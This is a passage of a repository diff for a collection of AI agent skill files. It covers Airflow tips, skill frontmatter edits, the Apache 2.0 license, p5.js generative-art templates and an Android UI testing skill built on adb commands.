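A non-idempotent append-only load would instead double the row count on every retry.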

### Don'ts
- **Don't use `depends_on_past=True`** - Creates bottlenecks
- **Don't hardcode dates** - Use `{{ ds }}` and other template macros
- **Don't use global state** - Tasks should be stateless
- **Don't skip catchup blindly** - Understand the implications
- **Don't put heavy logic in the DAG file** - Import it from modules
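
The "don't hardcode dates" rule means a task derives its inputs from the logical date the scheduler passes in (`{{ ds }}` in templates, or the `ds` kwarg in Python callables), never from "today". A minimal sketch with a hypothetical bucket layout:

```python
def input_path_for(ds: str) -> str:
    # Derive the partition from the logical date, not date.today(),
    # so backfills re-read exactly the partition they target.
    return f"s3://raw/events/{ds}/data.parquet"

# A backfill run for 2024-01-01 reads that day's partition even if
# executed weeks later:
print(input_path_for("2024-01-01"))  # s3://raw/events/2024-01-01/data.parquet
```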
## Resources

- [Airflow Documentation](https://airflow.apache.org/docs/)
- [Astronomer Guides](https://docs.astronomer.io/learn)
- [TaskFlow API](https://airflow.apache.org/docs/apache-airflow/stable/tutorial/taskflow.html)

@@ -1,10 +1,9 @@
---
name: airtable-automation
description: "Automate Airtable tasks via Rube MCP (Composio): records, bases, tables, fields, views. Always search tools first for current schemas."
requires:
  mcp: [rube]
risk: unknown
source: community
date_added: "2026-02-27"
---

# Airtable Automation via Rube MCP

@@ -1,8 +1,9 @@
---
name: algolia-search
description: "Expert patterns for Algolia search implementation, indexing strategies, React InstantSearch, and relevance tuning. Use when: adding search to, algolia, instantsearch, search api, search functionality."
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# Algolia Search Integration

202
web-app/public/skills/algorithmic-art/LICENSE.txt
Normal file
@@ -0,0 +1,202 @@

                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/

   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION

   1. Definitions.

      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.

      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.

      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.

      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.

      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.

      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.

      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).

      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.

      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."

      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by Licensor and
      subsequently incorporated within the Work.

   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.

   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.

   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:

      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and

      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and

      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and

      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding those notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.

      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.

   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.

   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.

   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.

   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.

   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.

   END OF TERMS AND CONDITIONS

   APPENDIX: How to apply the Apache License to your work.

      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!) The text should be enclosed in the appropriate
      comment syntax for the file format. We also recommend that a
      file or class name and description of purpose be included on the
      same "printed page" as the copyright notice for easier
      identification within third-party archives.

   Copyright [yyyy] [name of copyright owner]

   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at

       http://www.apache.org/licenses/LICENSE-2.0

   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.

@@ -1,9 +1,9 @@
---
name: algorithmic-art
description: "Creating algorithmic art using p5.js with seeded randomness and interactive parameter exploration. Use this when users request creating art using code, generative art, algorithmic art, flow fields,..."
license: Complete terms in LICENSE.txt
risk: unknown
source: community
date_added: "2026-02-27"
---

Algorithmic philosophies are computational aesthetic movements expressed through code. Output .md files (philosophy), .html files (interactive viewer), and .js files (generative algorithms).

@@ -0,0 +1,223 @@
/**
 * ═══════════════════════════════════════════════════════════════════════════
 * P5.JS GENERATIVE ART - BEST PRACTICES
 * ═══════════════════════════════════════════════════════════════════════════
 *
 * This file shows STRUCTURE and PRINCIPLES for p5.js generative art.
 * It does NOT prescribe what art you should create.
 *
 * Your algorithmic philosophy should guide what you build.
 * These are just best practices for how to structure your code.
 *
 * ═══════════════════════════════════════════════════════════════════════════
 */

// ============================================================================
// 1. PARAMETER ORGANIZATION
// ============================================================================
// Keep all tunable parameters in one object.
// This makes it easy to:
// - Connect to UI controls
// - Reset to defaults
// - Serialize/save configurations

let params = {
  // Define parameters that match YOUR algorithm.
  // Examples (customize for your art):
  // - Counts: how many elements (particles, circles, branches, etc.)
  // - Scales: size, speed, spacing
  // - Probabilities: likelihood of events
  // - Angles: rotation, direction
  // - Colors: palette arrays

  seed: 12345,
  // Define colorPalette as an array -- choose whatever colors you'd like
  colorPalette: ['#d97757', '#6a9bcc', '#788c5d', '#b0aea5'],
  // Add YOUR parameters here based on your algorithm
};

// ============================================================================
// 2. SEEDED RANDOMNESS (Critical for reproducibility)
// ============================================================================
// ALWAYS use seeded random for Art Blocks-style reproducible output

function initializeSeed(seed) {
  randomSeed(seed);
  noiseSeed(seed);
  // Now all random() and noise() calls will be deterministic
}

// ============================================================================
// 3. P5.JS LIFECYCLE
// ============================================================================

function setup() {
  createCanvas(800, 800);

  // Initialize seed first
  initializeSeed(params.seed);

  // Set up your generative system.
  // This is where you initialize:
  // - Arrays of objects
  // - Grid structures
  // - Initial positions
  // - Starting states

  // For static art: call noLoop() at the end of setup.
  // For animated art: let draw() keep running.
}

function draw() {
  // Option 1: Static generation (runs once, then stops)
  // - Generate everything in setup()
  // - Call noLoop() in setup()
  // - draw() doesn't do much or can be empty

  // Option 2: Animated generation (continuous)
  // - Update your system each frame
  // - Common patterns: particle movement, growth, evolution
  // - Can optionally call noLoop() after N frames

  // Option 3: User-triggered regeneration
  // - Use noLoop() by default
  // - Call redraw() when parameters change
}

// ============================================================================
// 4. CLASS STRUCTURE (When you need objects)
// ============================================================================
// Use classes when your algorithm involves multiple entities.
// Examples: particles, agents, cells, nodes, etc.

class Entity {
  constructor() {
    // Initialize entity properties.
    // Use random() here - it will be seeded.
  }

  update() {
    // Update entity state.
    // This might involve:
    // - Physics calculations
    // - Behavioral rules
    // - Interactions with neighbors
  }

  display() {
    // Render the entity.
    // Keep rendering logic separate from update logic.
  }
}

// ============================================================================
// 5. PERFORMANCE CONSIDERATIONS
// ============================================================================

// For large numbers of elements:
// - Pre-calculate what you can
// - Use simple collision detection (spatial hashing if needed)
// - Limit expensive operations (sqrt, trig) when possible
// - Consider using p5 vectors efficiently

// For smooth animation:
// - Aim for 60fps
// - Profile if things are slow
// - Consider reducing particle counts or simplifying calculations

// ============================================================================
// 6. UTILITY FUNCTIONS
// ============================================================================

// Color utilities
function hexToRgb(hex) {
  const result = /^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i.exec(hex);
  return result ? {
    r: parseInt(result[1], 16),
    g: parseInt(result[2], 16),
    b: parseInt(result[3], 16)
  } : null;
}

function colorFromPalette(index) {
  return params.colorPalette[index % params.colorPalette.length];
}

// Mapping and easing
function mapRange(value, inMin, inMax, outMin, outMax) {
  return outMin + (outMax - outMin) * ((value - inMin) / (inMax - inMin));
}

function easeInOutCubic(t) {
  return t < 0.5 ? 4 * t * t * t : 1 - Math.pow(-2 * t + 2, 3) / 2;
}

// Wrap a value around the bounds
function wrapAround(value, max) {
  if (value < 0) return max;
  if (value > max) return 0;
  return value;
}

// ============================================================================
// 7. PARAMETER UPDATES (Connect to UI)
// ============================================================================

function updateParameter(paramName, value) {
  params[paramName] = value;
  // Decide if you need to regenerate or just update.
  // Some params can update in real-time; others need full regeneration.
}

function regenerate() {
  // Reinitialize your generative system.
  // Useful when parameters change significantly.
  initializeSeed(params.seed);
  // Then regenerate your system.
}

// ============================================================================
// 8. COMMON P5.JS PATTERNS
// ============================================================================

// Drawing with transparency for trails/fading
function fadeBackground(opacity) {
  fill(250, 249, 245, opacity); // Anthropic light with alpha
  noStroke();
  rect(0, 0, width, height);
}

// Using noise for organic variation
function getNoiseValue(x, y, scale = 0.01) {
  return noise(x * scale, y * scale);
}

// Creating vectors from angles
function vectorFromAngle(angle, magnitude = 1) {
  return createVector(cos(angle), sin(angle)).mult(magnitude);
}

// ============================================================================
// 9. EXPORT FUNCTIONS
// ============================================================================

function exportImage() {
  saveCanvas('generative-art-' + params.seed, 'png');
}

// ============================================================================
// REMEMBER
// ============================================================================
//
// These are TOOLS and PRINCIPLES, not a recipe.
// Your algorithmic philosophy should guide WHAT you create.
// This structure helps you create it WELL.
//
// Focus on:
// - Clean, readable code
// - Parameterized for exploration
// - Seeded for reproducibility
// - Performant execution
//
// The art itself is entirely up to you!
//
// ============================================================================
599
web-app/public/skills/algorithmic-art/templates/viewer.html
Normal file
@@ -0,0 +1,599 @@
<!DOCTYPE html>
<!--
THIS IS A TEMPLATE THAT SHOULD BE USED EVERY TIME AND MODIFIED.
WHAT TO KEEP:
✓ Overall structure (header, sidebar, main content)
✓ Anthropic branding (colors, fonts, layout)
✓ Seed navigation section (always include this)
✓ Self-contained artifact (everything inline)

WHAT TO CREATIVELY EDIT:
✗ The p5.js algorithm (implement YOUR vision)
✗ The parameters (define what YOUR art needs)
✗ The UI controls (match YOUR parameters)

Let your philosophy guide the implementation.
The world is your oyster - be creative!
-->
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Generative Art Viewer</title>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/p5.js/1.7.0/p5.min.js"></script>
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600&family=Lora:wght@400;500&display=swap" rel="stylesheet">
  <style>
    /* Anthropic Brand Colors */
    :root {
      --anthropic-dark: #141413;
      --anthropic-light: #faf9f5;
      --anthropic-mid-gray: #b0aea5;
      --anthropic-light-gray: #e8e6dc;
      --anthropic-orange: #d97757;
      --anthropic-blue: #6a9bcc;
      --anthropic-green: #788c5d;
    }

    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    body {
      font-family: 'Poppins', sans-serif;
      background: linear-gradient(135deg, var(--anthropic-light) 0%, #f5f3ee 100%);
      min-height: 100vh;
      color: var(--anthropic-dark);
    }

    .container {
      display: flex;
      min-height: 100vh;
      padding: 20px;
      gap: 20px;
    }
    /* Sidebar */
    .sidebar {
      width: 320px;
      flex-shrink: 0;
      background: rgba(255, 255, 255, 0.95);
      backdrop-filter: blur(10px);
      padding: 24px;
      border-radius: 12px;
      box-shadow: 0 10px 30px rgba(20, 20, 19, 0.1);
      overflow-y: auto;
      overflow-x: hidden;
    }

    .sidebar h1 {
      font-family: 'Lora', serif;
      font-size: 24px;
      font-weight: 500;
      color: var(--anthropic-dark);
      margin-bottom: 8px;
    }

    .sidebar .subtitle {
      color: var(--anthropic-mid-gray);
      font-size: 14px;
      margin-bottom: 32px;
      line-height: 1.4;
    }

    /* Control Sections */
    .control-section {
      margin-bottom: 32px;
    }

    .control-section h3 {
      font-size: 16px;
      font-weight: 600;
      color: var(--anthropic-dark);
      margin-bottom: 16px;
      display: flex;
      align-items: center;
      gap: 8px;
    }

    .control-section h3::before {
      content: '•';
      color: var(--anthropic-orange);
      font-weight: bold;
    }

    /* Seed Controls */
    .seed-input {
      width: 100%;
      background: var(--anthropic-light);
      padding: 12px;
      border-radius: 8px;
      font-family: 'Courier New', monospace;
      font-size: 14px;
      margin-bottom: 12px;
      border: 1px solid var(--anthropic-light-gray);
      text-align: center;
    }

    .seed-input:focus {
      outline: none;
      border-color: var(--anthropic-orange);
      box-shadow: 0 0 0 2px rgba(217, 119, 87, 0.1);
      background: white;
    }

    .seed-controls {
      display: grid;
      grid-template-columns: 1fr 1fr;
      gap: 8px;
      margin-bottom: 8px;
    }

    .regen-button {
      margin-bottom: 0;
    }

    /* Parameter Controls */
    .control-group {
      margin-bottom: 20px;
    }

    .control-group label {
      display: block;
      font-size: 14px;
      font-weight: 500;
      color: var(--anthropic-dark);
      margin-bottom: 8px;
    }

    .slider-container {
      display: flex;
      align-items: center;
      gap: 12px;
    }

    .slider-container input[type="range"] {
      flex: 1;
      height: 4px;
      background: var(--anthropic-light-gray);
      border-radius: 2px;
      outline: none;
      -webkit-appearance: none;
    }

    .slider-container input[type="range"]::-webkit-slider-thumb {
      -webkit-appearance: none;
      width: 16px;
      height: 16px;
      background: var(--anthropic-orange);
      border-radius: 50%;
      cursor: pointer;
      transition: all 0.2s ease;
    }

    .slider-container input[type="range"]::-webkit-slider-thumb:hover {
      transform: scale(1.1);
      background: #c86641;
    }

    .slider-container input[type="range"]::-moz-range-thumb {
      width: 16px;
      height: 16px;
      background: var(--anthropic-orange);
      border-radius: 50%;
      border: none;
      cursor: pointer;
      transition: all 0.2s ease;
    }

    .value-display {
      font-family: 'Courier New', monospace;
      font-size: 12px;
      color: var(--anthropic-mid-gray);
      min-width: 60px;
      text-align: right;
    }
    /* Color Pickers */
    .color-group {
      margin-bottom: 16px;
    }

    .color-group label {
      display: block;
      font-size: 12px;
      color: var(--anthropic-mid-gray);
      margin-bottom: 4px;
    }

    .color-picker-container {
      display: flex;
      align-items: center;
      gap: 8px;
    }

    .color-picker-container input[type="color"] {
      width: 32px;
      height: 32px;
      border: none;
      border-radius: 6px;
      cursor: pointer;
      background: none;
      padding: 0;
    }

    .color-value {
      font-family: 'Courier New', monospace;
      font-size: 12px;
      color: var(--anthropic-mid-gray);
    }

    /* Buttons */
    .button {
      background: var(--anthropic-orange);
      color: white;
      border: none;
      padding: 10px 16px;
      border-radius: 6px;
      font-size: 14px;
      font-weight: 500;
      cursor: pointer;
      transition: all 0.2s ease;
      width: 100%;
    }

    .button:hover {
      background: #c86641;
      transform: translateY(-1px);
    }

    .button:active {
      transform: translateY(0);
    }

    .button.secondary {
      background: var(--anthropic-blue);
    }

    .button.secondary:hover {
      background: #5a8bb8;
    }

    .button.tertiary {
      background: var(--anthropic-green);
    }

    .button.tertiary:hover {
      background: #6b7b52;
    }

    .button-row {
      display: flex;
      gap: 8px;
    }

    .button-row .button {
      flex: 1;
    }

    /* Canvas Area */
    .canvas-area {
      flex: 1;
      display: flex;
      align-items: center;
      justify-content: center;
      min-width: 0;
    }

    #canvas-container {
      width: 100%;
      max-width: 1000px;
      border-radius: 12px;
      overflow: hidden;
      box-shadow: 0 20px 40px rgba(20, 20, 19, 0.1);
      background: white;
    }

    #canvas-container canvas {
      display: block;
      width: 100% !important;
      height: auto !important;
    }

    /* Loading State */
    .loading {
      display: flex;
      align-items: center;
      justify-content: center;
      font-size: 18px;
      color: var(--anthropic-mid-gray);
    }

    /* Responsive - Stack on mobile */
    @media (max-width: 600px) {
      .container {
        flex-direction: column;
      }

      .sidebar {
        width: 100%;
      }

      .canvas-area {
        padding: 20px;
      }
    }
  </style>
</head>
<body>
  <div class="container">
    <!-- Control Sidebar -->
    <div class="sidebar">
      <!-- Headers (CUSTOMIZE THIS FOR YOUR ART) -->
      <h1>TITLE - EDIT</h1>
      <div class="subtitle">SUBHEADER - EDIT</div>

      <!-- Seed Section (ALWAYS KEEP THIS) -->
      <div class="control-section">
        <h3>Seed</h3>
        <input type="number" id="seed-input" class="seed-input" value="12345" onchange="updateSeed()">
        <div class="seed-controls">
          <button class="button secondary" onclick="previousSeed()">← Prev</button>
          <button class="button secondary" onclick="nextSeed()">Next →</button>
        </div>
        <button class="button tertiary regen-button" onclick="randomSeedAndUpdate()">↻ Random</button>
      </div>

      <!-- Parameters Section (CUSTOMIZE THIS FOR YOUR ART) -->
      <div class="control-section">
        <h3>Parameters</h3>

        <!-- Particle Count -->
        <div class="control-group">
          <label>Particle Count</label>
          <div class="slider-container">
            <input type="range" id="particleCount" min="1000" max="10000" step="500" value="5000" oninput="updateParam('particleCount', this.value)">
            <span class="value-display" id="particleCount-value">5000</span>
          </div>
        </div>

        <!-- Flow Speed -->
        <div class="control-group">
          <label>Flow Speed</label>
          <div class="slider-container">
            <input type="range" id="flowSpeed" min="0.1" max="2.0" step="0.1" value="0.5" oninput="updateParam('flowSpeed', this.value)">
            <span class="value-display" id="flowSpeed-value">0.5</span>
          </div>
        </div>

        <!-- Noise Scale -->
        <div class="control-group">
          <label>Noise Scale</label>
          <div class="slider-container">
            <input type="range" id="noiseScale" min="0.001" max="0.02" step="0.001" value="0.005" oninput="updateParam('noiseScale', this.value)">
            <span class="value-display" id="noiseScale-value">0.005</span>
          </div>
        </div>

        <!-- Trail Length -->
        <div class="control-group">
          <label>Trail Length</label>
          <div class="slider-container">
            <input type="range" id="trailLength" min="2" max="20" step="1" value="8" oninput="updateParam('trailLength', this.value)">
            <span class="value-display" id="trailLength-value">8</span>
          </div>
        </div>
      </div>

      <!-- Colors Section (OPTIONAL - CUSTOMIZE OR REMOVE) -->
      <div class="control-section">
        <h3>Colors</h3>

        <!-- Color 1 -->
        <div class="color-group">
          <label>Primary Color</label>
          <div class="color-picker-container">
            <input type="color" id="color1" value="#d97757" onchange="updateColor('color1', this.value)">
            <span class="color-value" id="color1-value">#d97757</span>
          </div>
        </div>

        <!-- Color 2 -->
        <div class="color-group">
          <label>Secondary Color</label>
          <div class="color-picker-container">
            <input type="color" id="color2" value="#6a9bcc" onchange="updateColor('color2', this.value)">
            <span class="color-value" id="color2-value">#6a9bcc</span>
          </div>
        </div>

        <!-- Color 3 -->
        <div class="color-group">
          <label>Accent Color</label>
          <div class="color-picker-container">
            <input type="color" id="color3" value="#788c5d" onchange="updateColor('color3', this.value)">
            <span class="color-value" id="color3-value">#788c5d</span>
          </div>
        </div>
      </div>

      <!-- Actions Section (ALWAYS KEEP THIS) -->
      <div class="control-section">
        <h3>Actions</h3>
        <div class="button-row">
          <button class="button" onclick="resetParameters()">Reset</button>
        </div>
      </div>
    </div>

    <!-- Main Canvas Area -->
    <div class="canvas-area">
      <div id="canvas-container">
        <div class="loading">Initializing generative art...</div>
      </div>
    </div>
  </div>

  <script>
    // ═══════════════════════════════════════════════════════════════════════
    // GENERATIVE ART PARAMETERS - CUSTOMIZE FOR YOUR ALGORITHM
    // ═══════════════════════════════════════════════════════════════════════

    let params = {
      seed: 12345,
      particleCount: 5000,
      flowSpeed: 0.5,
      noiseScale: 0.005,
      trailLength: 8,
      colorPalette: ['#d97757', '#6a9bcc', '#788c5d']
    };

    let defaultParams = {...params}; // Store defaults for reset

    // ═══════════════════════════════════════════════════════════════════════
    // P5.JS GENERATIVE ART ALGORITHM - REPLACE WITH YOUR VISION
    // ═══════════════════════════════════════════════════════════════════════

    let particles = [];
    let flowField = [];
    let cols, rows;
    let scl = 10; // Flow field resolution

    function setup() {
      let canvas = createCanvas(1200, 1200);
      canvas.parent('canvas-container');

      initializeSystem();

      // Remove loading message
      document.querySelector('.loading').style.display = 'none';
    }

    function initializeSystem() {
      // Seed the randomness for reproducibility
      randomSeed(params.seed);
      noiseSeed(params.seed);

      // Clear particles and recreate
      particles = [];

      // Initialize particles
      for (let i = 0; i < params.particleCount; i++) {
        particles.push(new Particle());
      }

      // Calculate flow field dimensions
      cols = floor(width / scl);
      rows = floor(height / scl);

      // Generate flow field
      generateFlowField();

      // Clear background
      background(250, 249, 245); // Anthropic light background
    }

    function generateFlowField() {
      // fill this in
    }

    function draw() {
      // fill this in
    }

    // ═══════════════════════════════════════════════════════════════════════
    // PARTICLE SYSTEM - CUSTOMIZE FOR YOUR ALGORITHM
    // ═══════════════════════════════════════════════════════════════════════

    class Particle {
      constructor() {
        // fill this in
      }
      // fill this in
    }

    // ═══════════════════════════════════════════════════════════════════════
    // UI CONTROL HANDLERS - CUSTOMIZE FOR YOUR PARAMETERS
    // ═══════════════════════════════════════════════════════════════════════

    function updateParam(paramName, value) {
      // fill this in
    }

    function updateColor(colorId, value) {
      // fill this in
    }

    // ═══════════════════════════════════════════════════════════════════════
    // SEED CONTROL FUNCTIONS - ALWAYS KEEP THESE
    // ═══════════════════════════════════════════════════════════════════════

    function updateSeedDisplay() {
      document.getElementById('seed-input').value = params.seed;
    }

    function updateSeed() {
      let input = document.getElementById('seed-input');
      let newSeed = parseInt(input.value);
      if (newSeed && newSeed > 0) {
        params.seed = newSeed;
        initializeSystem();
      } else {
        // Reset to current seed if invalid
        updateSeedDisplay();
      }
    }

    function previousSeed() {
      params.seed = Math.max(1, params.seed - 1);
      updateSeedDisplay();
      initializeSystem();
    }

    function nextSeed() {
      params.seed = params.seed + 1;
      updateSeedDisplay();
      initializeSystem();
    }

    function randomSeedAndUpdate() {
      params.seed = Math.floor(Math.random() * 999999) + 1;
      updateSeedDisplay();
      initializeSystem();
    }

    function resetParameters() {
      params = {...defaultParams};

      // Update UI elements
      document.getElementById('particleCount').value = params.particleCount;
      document.getElementById('particleCount-value').textContent = params.particleCount;
      document.getElementById('flowSpeed').value = params.flowSpeed;
      document.getElementById('flowSpeed-value').textContent = params.flowSpeed;
      document.getElementById('noiseScale').value = params.noiseScale;
      document.getElementById('noiseScale-value').textContent = params.noiseScale;
      document.getElementById('trailLength').value = params.trailLength;
      document.getElementById('trailLength-value').textContent = params.trailLength;

      // Reset colors
      document.getElementById('color1').value = params.colorPalette[0];
      document.getElementById('color1-value').textContent = params.colorPalette[0];
      document.getElementById('color2').value = params.colorPalette[1];
      document.getElementById('color2-value').textContent = params.colorPalette[1];
      document.getElementById('color3').value = params.colorPalette[2];
      document.getElementById('color3-value').textContent = params.colorPalette[2];

      updateSeedDisplay();
      initializeSystem();
    }

    // Initialize UI on load
    window.addEventListener('load', function() {
      updateSeedDisplay();
    });
  </script>
</body>
</html>
@@ -1,10 +1,9 @@
---
name: amplitude-automation
description: "Automate Amplitude tasks via Rube MCP (Composio): events, user activity, cohorts, user identification. Always search tools first for current schemas."
requires:
  mcp: [rube]
risk: unknown
source: community
date_added: "2026-02-27"
---

# Amplitude Automation via Rube MCP
@@ -1,13 +1,9 @@
---
name: analytics-tracking
description: >
  Design, audit, and improve analytics tracking systems that produce reliable,
  decision-ready data. Use when the user wants to set up, fix, or evaluate
  analytics tracking (GA4, GTM, product analytics, events, conversions, UTMs).
  This skill focuses on measurement strategy, signal quality, and validation—
  not just firing events.
description: Design, audit, and improve analytics tracking systems that produce reliable, decision-ready data.
risk: unknown
source: community
date_added: '2026-02-27'
---

# Analytics Tracking & Measurement Strategy
@@ -1,8 +1,9 @@
---
name: android-jetpack-compose-expert
description: Expert guidance for building modern Android UIs with Jetpack Compose, covering state management, navigation, performance, and Material Design 3.
description: "Expert guidance for building modern Android UIs with Jetpack Compose, covering state management, navigation, performance, and Material Design 3."
risk: safe
source: community
date_added: "2026-02-27"
---

# Android Jetpack Compose Expert
66 web-app/public/skills/android_ui_verification/SKILL.md Normal file
@@ -0,0 +1,66 @@
---
name: android_ui_verification
description: Automated end-to-end UI testing and verification on an Android Emulator using ADB.
risk: safe
source: community
date_added: "2026-02-28"
---

# Android UI Verification Skill

This skill provides a systematic approach to testing React Native applications on an Android emulator using ADB commands. It allows for autonomous interaction, state verification, and visual regression checking.

## When to Use
- Verifying UI changes in React Native or Native Android apps.
- Autonomous debugging of layout issues or interaction bugs.
- Ensuring feature functionality when manual testing is too slow.
- Capturing automated screenshots for PR documentation.

## 🛠 Prerequisites
- Android Emulator running.
- `adb` installed and in PATH.
- Application in debug mode for logcat access.

## 🚀 Workflow

### 1. Device Calibration
Before interacting, always verify the screen resolution to ensure tap coordinates are accurate.
```bash
adb shell wm size
```
*Note: Layouts are often scaled. Use the physical size returned as the base for coordinate calculations.*

### 2. UI Inspection (State Discovery)
Use the `uiautomator` dump to find the exact bounds of UI elements (buttons, inputs).
```bash
adb shell uiautomator dump /sdcard/view.xml && adb pull /sdcard/view.xml ./artifacts/view.xml
```
Search the `view.xml` for `text`, `content-desc`, or `resource-id`. The `bounds` attribute `[x1,y1][x2,y2]` defines the clickable area.
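As a sketch, that lookup can be scripted. The `text="Login"` target, the single-node input, and the attribute order (bounds after text, as in typical uiautomator output) are assumptions for illustration:

```shell
# Demo stand-in for a real uiautomator dump (hypothetical node).
mkdir -p artifacts
printf '<node text="Login" resource-id="btn" bounds="[100,200][300,400]"/>' > artifacts/view.xml

# Pull the bounds of the node whose text matches:
grep -o 'text="Login"[^>]*bounds="\[[^"]*\]"' artifacts/view.xml \
  | grep -o '\[[0-9,]*\]\[[0-9,]*\]'   # prints [100,200][300,400]
```

On a real dump, replace the `printf` stand-in with the pulled `view.xml` and adjust the `text=` pattern to the element you are looking for.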

